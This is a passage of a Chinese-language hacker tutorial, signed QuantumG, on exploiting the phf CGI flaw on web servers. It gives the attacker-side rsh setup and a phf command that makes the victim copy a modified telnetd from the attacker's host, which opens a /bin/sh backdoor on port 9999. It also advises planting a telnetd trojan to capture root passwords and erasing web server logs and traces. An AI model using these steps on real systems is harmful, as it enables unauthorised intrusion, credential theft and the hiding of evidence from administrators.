，这并不是一件难事。你可以 （1）、检查是否有可读写的ftp目录；（2）使用rcp（这是我最喜欢用的）。为了使用这个命 令，你需要对本地主机进行设置。（如果本地主机是你hack过的，那就好办多了。）首先是获得有效的用户帐号，名字应该简单而不易被注意（如：test）；其次，把目标主机名写入本地 主机的/etc/host.equiv中；接着就是在/etc/inetd.conf中必须有shell行；最後，在用户（test）根目录下建立含有目标主机名和httpd用户的.rhost文件。如下： /etc/hosts.equiv: h++p://www.host.to.hack/ /etc/inetd.conf: shell stream tcp nowait root /usr/sbin/tcpd in.rshd -L ~test/.rhosts: h++p://www.host.to.hack/ nobody 好。一旦一切都设置好了，便可以从远程主机上获取资料了。 我以前采用的hack方法，都是将经过多次修改的小hack代码传送给phf执行。这并是一件轻松的事情，而且效率也不高。现在我找到了一个更好的解决办法被传送的是一个经过修改 的in.telnetd，它被改为在「debug」方式下启动，「debug」方式将允许从端口9999登录，而且执行的shell是/bin/sh，而不是/bin/login。该in.telnetd允许在端口9999接受任意多的连接和执行shell。 因而，为了使远程主机做到这一点，所要做的就是将其放入用户根目录， 并确保可读。然後执行： phf 'rcp test@my.ip.address:bindwarez /tmp' h++p://www.host.to.hack/ 在本地日志文件中，你会看到一个与in.rshd的连接和它所执行的命令（如：rcp -fbindwarez）...当phf执行完後，bindwarez会被复制到远程主机上的/tmp目录下，於是你便可以执行这个文件并远程登录到端口9999。 如果这个网站的用户笨到以root运行http，你就可以通过安装一个in.telnetd特洛木马并清除日志，以获得root用户的密码。然而，在大多数情况下，你只能获得nobody权限，需要通过系统的其它漏洞去「黑」root用户。我常常发现这并不困难，因为系统管理员往往认 为没有人会在WWW服务器上运行shell，因而没有必要设置安全系统。很显示，他们并不了 解自己的系统是否存在phf缺陷。 在这里，我不必再次强调清除日志的重要性。你在rcp命令中输入的地址是可以让系统管理 员轻易发现的。这些日志通常在/usr/local/etc/httpd/logs或/var/lib/http/logs下。 最简单的方法是在这些路径上查找它。如果找不到，可以执行find / -name cgi-bin。 另外，不要忘记清除indwarez进程和删除/tmp/bindwarez文件。 这个非常巧妙的攻击方法让phf做你想做的事，而phf对此却无可奈何。 ;-)) L8s QuantumG